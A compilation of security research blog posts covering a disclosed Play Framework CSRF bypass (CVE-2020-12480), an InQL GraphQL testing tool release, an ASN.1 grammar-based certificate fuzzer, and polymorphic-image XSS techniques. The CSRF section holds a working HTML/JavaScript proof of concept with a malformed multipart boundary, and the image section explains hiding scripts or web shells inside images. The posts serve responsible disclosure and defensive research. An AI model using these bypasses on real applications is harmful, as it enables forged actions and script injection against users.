
This blog post illustrates a vulnerability affecting the Play framework that we discovered during a client engagement. This issue allows a complete Cross-Site Request Forgery (CSRF) protection bypass under specific configurations.

In its own words, the Play Framework is a high velocity web framework for Java and Scala. It is built on Akka, a toolkit for building highly concurrent, distributed, and resilient message-driven applications for Java and Scala.

Play is a widely used framework and is deployed on web platforms for both large and small organizations, such as Verizon, Walmart, The Guardian, LinkedIn, Samsung and many others.

In older versions of the framework, CSRF protection was provided by an insecure baseline mechanism, which applied even when CSRF tokens were not present in the HTTP requests.

This mechanism was based on the basic differences between Simple Requests and Preflighted Requests. Let’s explore the details of that.

A Simple Request has a strict ruleset. Whenever these rules are followed, the user agent (e.g. a browser) won’t issue an OPTIONS request, even if the request is made through XMLHttpRequest. All rules and details can be found on this Mozilla Developer page, although we are primarily interested in the Content-Type ruleset.

The Content-Type header for simple requests can contain one of three values:

application/x-www-form-urlencoded

multipart/form-data

text/plain

If you specify a different Content-Type, such as application/json, then the browser will send an OPTIONS request to verify that the web server allows such a request.
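The Content-Type rule can be sketched in a few lines of Python. This is only a simplified model: the function names are ours, and a real browser also takes the HTTP method and the other request headers into account before deciding whether to preflight.

```python
# The three Content-Type values allowed in a "simple request".
SIMPLE_CONTENT_TYPES = {
    "application/x-www-form-urlencoded",
    "multipart/form-data",
    "text/plain",
}


def mime_essence(content_type: str) -> str:
    """Return the lowercased type/subtype, ignoring parameters such as charset."""
    return content_type.split(";", 1)[0].strip().lower()


def triggers_preflight(content_type: str) -> bool:
    """Hypothetical helper: models only the Content-Type rule, nothing else."""
    return mime_essence(content_type) not in SIMPLE_CONTENT_TYPES


if __name__ == "__main__":
    for value in ("text/plain; charset=UTF-8", "application/json"):
        print(value, "->", "preflight" if triggers_preflight(value) else "simple")
```

Note that parameters such as charset or boundary do not change the outcome in this model, since only the type/subtype pair is compared.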

Now that we understand the differences between preflighted and simple requests, we can continue onwards to understand how Play used to protect against CSRF attacks.

In older versions of the framework (up to and including version 2.5), a blacklist approach on the received Content-Type header was used as a CSRF prevention mechanism.

In the 2.8.x migration guide, we can see how users could restore Play’s old default behavior if required by legacy systems or other dependencies:

application.conf

play.filters.csrf {
  header {
    bypassHeaders {
      X-Requested-With = "*"
      Csrf-Token = "nocheck"
    }
    protectHeaders = null
  }
  bypassCorsTrustedOrigins = false
  method {
    whiteList = []
    blackList = ["POST"]
  }
  contentType.blackList = ["application/x-www-form-urlencoded", "multipart/form-data", "text/plain"]
}

In the snippet above we can see the core of the old protection. The contentType.blackList setting contains three values, which are identical to the content types allowed in “simple requests”. This has been considered a valid (although not ideal) protection, since the following scenarios are prevented:

A cross-site <form> element which posts to victim.com: a form can only send one of the three blacklisted content types, so the request is subject to the CSRF check.

A cross-site POST to victim.com with application/json: since application/json is not allowed in a “simple request”, an OPTIONS will be sent and (assuming a proper configuration) CORS will block the request.

Hence, you now have CSRF protection. Or do you?

Armed with this knowledge, the first thing that comes to mind is that we need to make the browser issue a request that does not trigger a preflight and that does not match any values in the contentType.blackList setting.

The first thing we did was map out requests that we could modify without sending an OPTIONS preflight. This came down to a single request: Content-Type: multipart/form-data

This appeared immediately interesting thanks to the boundary value: Content-Type: multipart/form-data; boundary=something

The description can be found here:

For multipart entities the boundary directive is required, which consists of 1 to 70 characters from a set of characters known to be very robust through email gateways, and not ending with white space. It is used to encapsulate the boundaries of the multiple parts of the message. Often, the header boundary is prepended with two dashes and the final boundary has two dashes appended at the end.

So, we have a field that can actually be modified with plenty of different characters and it is all attacker-controlled.
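For reference, the rule quoted above can be written down as a short check. This is a sketch based on our reading of the boundary grammar in RFC 2046 (section 5.1.1); the helper name is ours, and nothing here implies that browsers or servers actually enforce it.

```python
import re

# RFC 2046, section 5.1.1:
#   boundary      := 0*69<bchars> bcharsnospace
#   bcharsnospace := DIGIT / ALPHA / "'" / "(" / ")" / "+" / "_" / ","
#                    / "-" / "." / "/" / ":" / "=" / "?"
_BCHARS_NOSPACE = r"0-9A-Za-z'()+_,\-./:=?"
_BOUNDARY_RE = re.compile(rf"[{_BCHARS_NOSPACE} ]{{0,69}}[{_BCHARS_NOSPACE}]")


def is_rfc2046_boundary(value: str) -> bool:
    """Hypothetical helper: True if value is 1 to 70 allowed characters
    and does not end with a space."""
    return _BOUNDARY_RE.fullmatch(value) is not None


if __name__ == "__main__":
    print(is_rfc2046_boundary("----WebKitFormBoundary7MA4YWxkTrZu0gW"))
    print(is_rfc2046_boundary("ends with a space "))
```

The set is large, which is what makes the boundary attractive as an attacker-controlled field. A semicolon is not part of it, which becomes relevant only if some component in the chain parses the header strictly.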

Now we need to dig deep into the parsing of these headers. To do that, we need to take a look at Akka HTTP, which is what the Play framework is based on.

Looking at HttpHeaderParser.scala, we can see that these headers are always parsed:

private val alwaysParsedHeaders = Set[String](
  "connection",
  "content-encoding",
  "content-length",
  "content-type",
  "expect",
  "host",
  "sec-websocket-key",
  "sec-websocket-protocol",
  "sec-websocket-version",
  "transfer-encoding",
  "upgrade"
)

And the parsing rules can be seen in HeaderParser.scala which follows RFC 7230 Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing, June 2014.

def `header-field-value`: Rule1[String] = rule {
  FWS ~ clearSB() ~ `field-value` ~ FWS ~ EOI ~ push(sb.toString)
}

def `field-value` = {
  var fwsStart = cursor
  rule {
    zeroOrMore(`field-value-chunk`).separatedBy { // zeroOrMore because we need to also accept empty values
      run { fwsStart = cursor } ~ FWS ~ &(`field-value-char`) ~ run { if (cursor > fwsStart) sb.append(' ') }
    }
  }
}

def `field-value-chunk` = rule { oneOrMore(`field-value-char` ~ appendSB()) }
def `field-value-char` = rule { VCHAR | `obs-text` }
def FWS = rule { zeroOrMore(WSP) ~ zeroOrMore(`obs-fold`) }
def `obs-fold` = rule { CRLF ~ oneOrMore(WSP) }

If these parsing rules are not obeyed, the value will be set to None. Perfect! That is exactly what we need for bypassing the CSRF protection: a “simple request” whose Content-Type is parsed as None and therefore never matches the blacklist.
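To make the logic concrete, here is a minimal Python model of the flaw. It is not Play's or Akka HTTP's code: the regular expression is our rough approximation of the RFC 7231 media-type grammar, and parse_content_type and csrf_check_required are hypothetical names used only for illustration.

```python
import re
from typing import Optional

# Rough approximation of the RFC 7231 media-type grammar:
#   type "/" subtype *( OWS ";" OWS token "=" ( token / quoted-string ) )
_TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
_QUOTED = r'"(?:[^"\\]|\\.)*"'
_MEDIA_TYPE_RE = re.compile(
    rf"({_TOKEN}/{_TOKEN})(?:[ \t]*;[ \t]*{_TOKEN}=(?:{_TOKEN}|{_QUOTED}))*[ \t]*"
)

BLACKLIST = {"application/x-www-form-urlencoded", "multipart/form-data", "text/plain"}


def parse_content_type(raw: str) -> Optional[str]:
    """Strict parser stand-in: returns None when the header is malformed."""
    match = _MEDIA_TYPE_RE.fullmatch(raw.strip())
    return match.group(1).lower() if match else None


def csrf_check_required(raw_header: str) -> bool:
    """Blacklist check as modelled here: an unparsable header is never blacklisted."""
    content_type = parse_content_type(raw_header)
    return content_type is not None and content_type in BLACKLIST


if __name__ == "__main__":
    for header in (
        "multipart/form-data; boundary=----139501139415121",
        "multipart/form-data; boundary=------;----139501139415121",
    ):
        print(header, "->", csrf_check_required(header))
```

In this model, a header that fails strict parsing collapses to None, and None is simply absent from the blacklist, so the request falls through without a token check. A deny-by-default design, where an unparsable Content-Type is treated as protected, would not have this gap.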

How do we actually forge a request that is allowed by the browser, but is considered invalid by the Akka HTTP parsing code?

We decided to let fuzzing answer that, and quickly discovered that the following transformation worked: Content-Type: multipart/form-data; boundary=--some;randomboundaryvalue

An extra semicolon inside the boundary value would do the trick and mark the request as illegal:

POST /count HTTP/1.1
Host: play.local:9000
...
Content-Type: multipart/form-data;boundary=------;---------------------139501139415121
Content-Length: 0

Response:

HTTP/1.1 200 OK
...
Content-Type: text/plain; charset=UTF-8
Content-Length: 1

5

This is also confirmed by looking at the logs of the server in development mode:

a.a.ActorSystemImpl - Illegal header: Illegal 'content-type' header: Invalid input 'EOI', exptected tchar, OWS or ws (line 1, column 74): multipart/form-data;boundary=------;---------------------139501139415121

And by instrumenting the Play framework code to print the value of the Content-Type:

Content-Type: None

Finally, we built the following proof-of-concept and notified our client (along with the Play framework maintainers):

<html>
  <body>
    <h1>Play Framework CSRF bypass</h1>
    <button type="button" onclick="poc()">PWN</button>
    <p id="demo"></p>
    <script>
      function poc() {
        var xhttp = new XMLHttpRequest();
        xhttp.onreadystatechange = function() {
          if (this.readyState == 4 && this.status == 200) {
            document.getElementById("demo").innerHTML = this.responseText;
          }
        };
        xhttp.open("POST", "http://play.local:9000/count", true);
        xhttp.setRequestHeader(
          "Content-type",
          "multipart/form-data; boundary=------;---------------------139501139415121"
        );
        xhttp.withCredentials = true;
        xhttp.send("");
      }
    </script>
  </body>
</html>

This vulnerability was discovered by Kevin Joensen and reported to the Play framework via security@playframework.com on April 24, 2020. The issue was fixed in Play 2.8.2 and 2.7.5. CVE-2020-12480 and all details were published by the vendor on August 10, 2020. Thanks to James Roper of Lightbend for the assistance.



After the public launch of InQL we received an overwhelming response from the community. We’re excited to announce a new major release available on GitHub. In this version (codenamed dyno-mites), we have introduced a few cool features and a new logo!

As you might know, InQL can be used as a stand-alone tool, or as a Burp Suite extension (available for both Professional and Community editions). Using GraphQL’s built-in introspection query, the tool collects queries, mutations, subscriptions, fields, arguments, etc. to automatically generate query templates that can be used for QA / security testing.

In this release, we introduced a standalone Jython GUI similar to the one available in Burp:

$ brew install jython
$ jython -m pip install inql
$ jython -m inql

Many users have asked for syntax highlighting and code completion. Et voilà!

InQL v2 includes an embedded GraphiQL server. This server works as a proxy and handles all the requests, enhancing them with authorization headers. The GraphiQL server improves the overall InQL experience by providing an advanced query editor with autocompletion and other useful features. We also introduced stubbing of introspection queries when introspection is not available.



We imagine people working between GraphiQL, InQL and other Burp Suite tools, so we included a custom “Send to GraphiQL” / “Send To Repeater” flow to move queries back and forth between the tools.

But that’s not all. On the Burp Suite extension side, InQL now handles batched queries and supports searching inside queries.

This was made possible by re-engineering the editor in use (e.g. the default Burp text editor) and including a new tabbed interface able to sync between multiple representations of these queries.

Finally, InQL is now available on the Burp Suite’s BApp store so that you can easily install the extension from within Burp’s extension tab.

In just three months, InQL has become the go-to utility for GraphQL security testing. We received a lot of positive feedback and decided to double down on the development. We will keep improving the tool based on users’ feedback and the experience we gain through our GraphQL security testing services.

This project was crafted with love in the Doyensec Research Island.

A good part of my research time at Doyensec was devoted to building a flexible ASN.1 grammar-based fuzzer for testing TLS certificate parsers. I learned a lot in the process, but I often struggled to find good resources on these topics. In this blogpost I want to give a high-level overview of the problem, the approach I’m taking, and some pointers which might hopefully save a little time for other fellow security researchers.

Let’s start with some basics.

A TLS certificate is a DER-encoded object conforming to the ASN.1 grammar and constraints defined in RFC 5280, which is based on the ITU X.509 standard.

That’s a lot of information to unpack, so let’s take it one piece at a time.

ASN.1 (Abstract Syntax Notation One) is a grammar used to define abstract objects. You can think of it as a much older and more complicated version of Protocol Buffers. ASN.1 however does not define an encoding, which is left to other standards. This language was designed by ITU and it is extremely powerful and general purpose.

This is how a message in a chat protocol might be defined:

Message ::= SEQUENCE {
    senderId     INTEGER,
    recipientId  INTEGER,
    message      UTF8String,
    sendTime     GeneralizedTime,
    ...
}

At first sight, ASN.1 might even seem quite simple and intuitive. But don’t be fooled! ASN.1 contains a lot of vestigial and complex features. For a start, it has ~13 string types. Constraints can be placed on fields; for instance, integer values and string sizes can be restricted to an acceptable range.

The real complexity beasts, however, are information objects, parametrization and tabular constraints. Information objects allow the definition of templates for data types and a grammar to declare instances of that template (oh yeah…defining a grammar within a grammar!).

This is how a template for different message types could be defined:

-- Definition of the MESSAGE-CLASS information object class
MESSAGE-CLASS ::= CLASS {
    &messageTypeId  INTEGER UNIQUE,
    &payload        [1] OPTIONAL,
    ...
}
WITH SYNTAX {
    MESSAGE-TYPE-ID  &messageTypeId
    [PAYLOAD         &payload]
}

-- Definition of some message types
TextMessageKinds MESSAGE-CLASS ::= {
    -- Text message
    {MESSAGE-TYPE-ID 0, PAYLOAD UTF8String}
    -- Read ACK (payload only references the acknowledged message)
    | {MESSAGE-TYPE-ID 1, PAYLOAD SEQUENCE { toMessageId INTEGER } }
}

MediaMessageKinds MESSAGE-CLASS ::= {
    -- JPEG
    {MESSAGE-TYPE-ID 2, PAYLOAD OCTET STRING}
}

Parametrization allows the introduction of parameters in the specification of a type:

Message {MESSAGE-CLASS : MessageClass} ::= SEQUENCE {
    messageId      INTEGER,
    senderId       INTEGER,
    recipientId    INTEGER,
    sendTime       GeneralizedTime,
    messageTypeId  MESSAGE-CLASS.&messageTypeId ({MessageClass}),
    payload        MESSAGE-CLASS.&payload ({MessageClass} {@messageTypeId})
}

While a complete overview of the format is not within the scope of this post, a very good entry-level, but quite comprehensive, resource I found is this ASN1 Survival guide. The nitty-gritty details can be found in the ITU standards X.680 to X.683.

Powerful as it may be, ASN.1 suffers from a large practical problem - it lacks a wide choice of compilers (parser generators), especially non-commercial ones. Most of them do not implement advanced features like information objects. This means that more often than not, data structures defined using ASN.1 are serialized and unserialized by handcrafted code instead of an autogenerated parser. This is also true for many libraries handling TLS certificates.

DER (Distinguished Encoding Rules) is an encoding used to translate an ASN.1 object into bytes. It is a simple Tag-Length-Value format: each element is encoded by appending its type (tag), the length of the payload, and the payload itself. Its rules ensure there is only one valid representation for any given object, a useful property when dealing with digital certificates that must be signed and checked for anomalies.
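As a quick illustration of the Tag-Length-Value idea, here is a small Python sketch that encodes a few primitive values by hand. The helper names are ours, and the sketch only covers single-byte tags and three universal types; it is nowhere near a complete DER encoder.

```python
def der_length(n: int) -> bytes:
    """Short form for lengths below 128, long form (0x80 | byte count) otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def der_tlv(tag: int, payload: bytes) -> bytes:
    """Concatenate tag, length and value (single-byte tags only)."""
    return bytes([tag]) + der_length(len(payload)) + payload


def der_integer(value: int) -> bytes:
    """INTEGER (tag 0x02): minimal big-endian two's complement."""
    magnitude = value if value >= 0 else ~value
    length = magnitude.bit_length() // 8 + 1
    return der_tlv(0x02, value.to_bytes(length, "big", signed=True))


def der_utf8string(text: str) -> bytes:
    """UTF8String (tag 0x0C)."""
    return der_tlv(0x0C, text.encode("utf-8"))


def der_sequence(*elements: bytes) -> bytes:
    """SEQUENCE (tag 0x30): the payload is the concatenation of the encoded elements."""
    return der_tlv(0x30, b"".join(elements))


if __name__ == "__main__":
    encoded = der_sequence(der_integer(1), der_utf8string("hi"))
    print(encoded.hex())
```

Because every value has exactly one minimal encoding (for instance, 128 must be encoded with a leading zero byte and nothing longer), two encoders given the same object should produce byte-identical output.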

The details of how DER works are not relevant to this post. A good place to start is here.

The format of the digital certificates used in TLS is defined in some RFCs, most importantly RFC 5280 (and then in RFC 5912, updated for ASN.1 2002). The specification is based on the ITU X.509 standard.

This is what the outermost layer of a TLS certificate contains:

Certificate ::= SEQUENCE {
    tbsCertificate       TBSCertificate,
    signatureAlgorithm   AlgorithmIdentifier,
    signature            BIT STRING
}

TBSCertificate ::= SEQUENCE {
    version         [0]  Version DEFAULT v1,
    serialNumber         CertificateSerialNumber,
    signature            AlgorithmIdentifier,
    issuer               Name,
    validity             Validity,
    subject              Name,
    subjectPublicKeyInfo SubjectPublicKeyInfo,
    issuerUniqueID  [1]  IMPLICIT UniqueIdentifier OPTIONAL,
                         -- If present, version MUST be v2 or v3
    subjectUniqueID [2]  IMPLICIT UniqueIdentifier OPTIONAL,
                         -- If present, version MUST be v2 or v3
    extensions      [3]  Extensions OPTIONAL
                         -- If present, version MUST be v3 --
}



You may recognize some of these fields from inspecting a certificate with a browser’s integrated certificate viewer.

Finding out what exactly should go inside a TLS certificate and how it should be interpreted was not an easy task - specifications were scattered inside a lot of RFCs and other standards, sometimes with partial or even conflicting information. Some documents from the recent past offer a good insight into the number of contradictory interpretations. Nowadays there seems to be more convergence, and a good place to start when looking for how a TLS certificate should be handled is the RFCs together with a couple of widely used TLS libraries.

All the high profile TLS libraries include some fuzzing harnesses directly in their source tree and most are even continuously fuzzed (like LibreSSL which is now included in oss-fuzz thanks to my colleague Andrea). Most libraries use tried-and-tested fuzzers like AFL or libFuzzer, which are not encoding or syntax aware. This very likely means that many cycles are wasted generating and testing inputs which are rejected early by the parsers.

X.509 parsers have been fuzzed using many approaches. Frankencert, for instance, generates certificates by combining parts from existing ones, while CertificateFuzzer uses a hand-coded grammar. Some fuzzing efforts are more targeted towards discovering memory-corruption types of bugs, while others are more geared towards discovering logic bugs, often comparing the behavior of multiple parsers side by side to detect inconsistencies.

I wanted a tool capable of generating valid inputs from an ASN.1 grammar, so that I could slightly break them and hopefully find some vulnerabilities. I couldn’t find any tool accepting ASN.1 grammars, so I decided to build one myself.

After a lot of experimentation and three full rewrites, I have a pipeline that generates valid X.509 certificates, which looks like this:

       +-------+
       | ASN.1 |
       +---+---+
           |
        pycrate
           |
   +-------v--------+        +--------------+
   | Python classes |        |  User Hooks  |
   +-------+--------+        +-------+------+
           |                         |
           +-----------+-------------+
                       |
                   Generator
                       |
                       |
                   +---v---+
                   |       |
                   |  AST  |
                   |       |
                   +---+---+
                       |
                    Encoder
                       |
                 +-----v------+
                 |            |
                 |   Output   |
                 |            |
                 +------------+

First, I compile the ASN.1 grammar using pycrate, one of the few FOSS compilers that support most of the advanced features of ASN.1.

The output of the compiler is fed into the Generator. With a lot of introspection inside the pycrate classes, this component generates random ASTs conforming to the input grammar.

The ASTs can be fed to an encoder (e.g. DER) to create a binary output suitable for being tested with the target application.

Certificates produced like this would not be valid, because many constraints are not encoded in the syntax. Moreover, I wanted to give the user total freedom to manipulate the generator behavior. To solve this problem I developed a handy hooking system which allows overrides at any point in the generator:

import random
import time

from pycrate_asn1dir.X509_2016 import AuthenticationFramework
from generator import Generator  # the Generator component of the pipeline above

spec = AuthenticationFramework.Certificate
cert_generator = Generator(spec)


@cert_generator.value_hook("Certificate/toBeSigned/validity/notBefore/.*")
def generate_notBefore(generator: Generator, node):
    now = int(time.time())
    start = now - 10 * 365 * 24 * 60 * 60  # 10 years ago
    return random.randint(start, now)


@cert_generator.node_hook("Certificate/toBeSigned/extensions/_item_[^/]*/"
                          "extnValue/ExtnType/_cont_ExtnType/keyIdentifier")
def force_akid_generation(generator: Generator, node):
    # keyIdentifier should be present unless the certificate is self-signed
    return generator.generate_node(node, ignore_hooks=True)


@cert_generator.value_hook("Certificate/signature")
def generate_signature(generator: Generator, node):
    # (... compute signature ...)
    return (sig, siglen)

The AST generated by this pipeline can already be used for differential testing. For instance, if one library accepts the certificate while others don’t, there may be a problem that requires manual investigation.
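The differential testing idea can be sketched as follows. This is not part of ASN1Fuzz: differential_verdicts and is_interesting are hypothetical helpers, and each parser is assumed to be a Python callable that raises an exception when it rejects the input.

```python
from typing import Callable, Dict


def differential_verdicts(
    cert_der: bytes, parsers: Dict[str, Callable[[bytes], object]]
) -> Dict[str, bool]:
    """Feed the same encoded certificate to every parser and record accept/reject."""
    verdicts = {}
    for name, parse in parsers.items():
        try:
            parse(cert_der)
            verdicts[name] = True
        except Exception:
            # Any exception is treated as a rejection in this sketch.
            verdicts[name] = False
    return verdicts


def is_interesting(verdicts: Dict[str, bool]) -> bool:
    """A test case deserves manual review when the parsers disagree."""
    return len(set(verdicts.values())) > 1
```

In practice each callable would wrap a real TLS library, and crashes or timeouts would need to be tracked separately from clean rejections.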

In addition, the ASTs can be mutated using a custom mutator for AFL++ which performs random operations on the tree.

ASN1Fuzz is currently research-quality code, but I do aim at open sourcing it at some point in the future. Since the generation starts from ASN.1 grammars, the tool is not limited to generating TLS certificates, and it could be leveraged in fuzzing a plethora of other protocols.

Stay tuned for the next blog post where I will present the results from this research!



A few months ago I came across a curious design pattern on Google Scholar. Multiple screens of the web application were fetched and rendered using a combination of location.hash parameters and XHR to retrieve the supposed templating snippets from a relative URI, rendering them on the page unescaped.

This is not dangerous per se, unless the platform lets users upload arbitrary content and serve it from the same origin, which unfortunately Google Scholar does, given its image upload functionality.

While any penetration tester worth her salt would deem the exploitation of the issue trivial, Scholar’s image processing backend was applying different transformations to the uploaded images (i.e. stripping metadata and reprocessing the picture). When reporting the vulnerability, Google’s VRP team did not consider the upload of a polymorphic image carrying a valid XSS payload possible, and instead requested a PoC||GTFO.

Given the age of this technique, I first went through all past “well-known” techniques to generate polymorphic pictures, and then developed a test suite to investigate the behavior of some of the most popular libraries for image processing (i.e. ImageMagick, GraphicsMagick, Libvips). This effort led to the discovery of some interesting caveats. Some of these methods can also be used to conceal web shells or JavaScript content to bypass “self” CSP directives.

The easiest approach is to embed our payload in the metadata of the image. In the case of JPEG/JFIF, these pieces of metadata are stored in application-specific markers (called APPX), but they are not taken into account by the majority of image libraries. Exiftool is a popular tool to edit those entries, but you may find that in some cases the characters will get entity-escaped, so I resorted to inserting them manually.

In the hope that Google Scholar would preserve some whitelisted EXIF tags, I created an image with 1.2k common EXIF tags, including CIPA standard and non-standard tags.

While that didn’t work in my case, some EXIF entries are to this day kept by many popular web platforms. In most of the image libraries tested, PNG metadata is always kept when converting from PNG to PNG, while it is always lost when converting from PNG to JPG.

The next technique will only work if no transformations are performed on the uploaded image, since image libraries only process the image content and discard anything that follows it. The trick involves appending the JavaScript payload to the end of the image file.
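A minimal Python sketch of the idea, assuming a JPEG target: the payload is simply concatenated after the End Of Image marker, and a checker looks for bytes following the last such marker. Both helper names are ours, and the marker search is deliberately naive (it assumes the payload itself does not contain the 0xFF 0xD9 sequence).

```python
JPEG_EOI = b"\xff\xd9"  # End Of Image marker


def append_payload(image: bytes, payload: bytes) -> bytes:
    """Concatenate the payload after the image data, leaving the image untouched."""
    return image + payload


def trailing_data(jpeg: bytes) -> bytes:
    """Return whatever follows the last EOI marker (empty if there is nothing)."""
    index = jpeg.rfind(JPEG_EOI)
    if index == -1:
        return b""
    return jpeg[index + len(JPEG_EOI):]
```

Running trailing_data on the file before and after it passes through an image pipeline is a quick way to tell whether the appended bytes survived.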

In PNGs, the IDAT chunk stores the pixel information. Depending on the transformations applied, you may be able to directly insert your raw payload in the IDAT chunks or you may try to bypass the resize and re-sampling operations. Google Scholar only generated JPG pictures, so I could not leverage this technique.
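For readers unfamiliar with the PNG layout, the following Python sketch builds a minimal 1x1 grayscale image and walks its chunks. The helper names are ours; the layout (length, type, data, CRC-32) follows the PNG specification.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def make_chunk(chunk_type: bytes, data: bytes) -> bytes:
    """A chunk is: 4-byte length, 4-byte type, data, CRC-32 over type + data."""
    crc = zlib.crc32(chunk_type + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + chunk_type + data + struct.pack(">I", crc)


def iter_chunks(png: bytes):
    """Yield (type, data) for every chunk after the signature."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    offset = len(PNG_SIGNATURE)
    while offset + 8 <= len(png):
        (length,) = struct.unpack_from(">I", png, offset)
        chunk_type = png[offset + 4:offset + 8]
        data = png[offset + 8:offset + 8 + length]
        yield chunk_type, data
        offset += 12 + length  # length + type + data + CRC


def minimal_png() -> bytes:
    """1x1, 8-bit grayscale image: IHDR, one IDAT chunk, IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    scanline = b"\x00\x00"  # filter type 0 followed by one black pixel
    return (
        PNG_SIGNATURE
        + make_chunk(b"IHDR", ihdr)
        + make_chunk(b"IDAT", zlib.compress(scanline))
        + make_chunk(b"IEND", b"")
    )


if __name__ == "__main__":
    for chunk_type, data in iter_chunks(minimal_png()):
        print(chunk_type.decode("ascii"), len(data))
```

The IDAT data is a zlib stream of filtered scanlines, which is why a payload has to be crafted so that it still reads as the intended text after the library has filtered and compressed the pixels.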



In the JFIF standard, the entropy-coded data segment (ECS) contains the output of the raw Huffman-compressed bitstream which represents the Minimum Coded Unit (MCU) that comprises the image data. In theory, it is possible to position our payload in this segment, but there are no guarantees that our payload will survive the transformation applied by the image library on the server. Creating a JPG image resistant to the transformations caused by the library was a process of trial and error.

As a starting point I crafted a “base” image with the same quality factors as the images resulting from the conversion. For this I ended up using this image having 0-length-string EXIFs. Even though having the payload positioned at a variable offset from the beginning of the section did not work, I found that when processed by Google Scholar the first bytes of the image’s ECS section were kept if separated by a pattern of 0x00 and 0x14 bytes.

From here it took me a little time to find the right sequence of bytes allowing the payload to survive the transformation, since the majority of user agents did not tolerate low-value bytes in the script tag definition of the page. For anyone interested, we have made available the images embedding the onclick and mouseover events. Our image library test suite is available on GitHub as doyensec/StandardizedImageProcessingTest.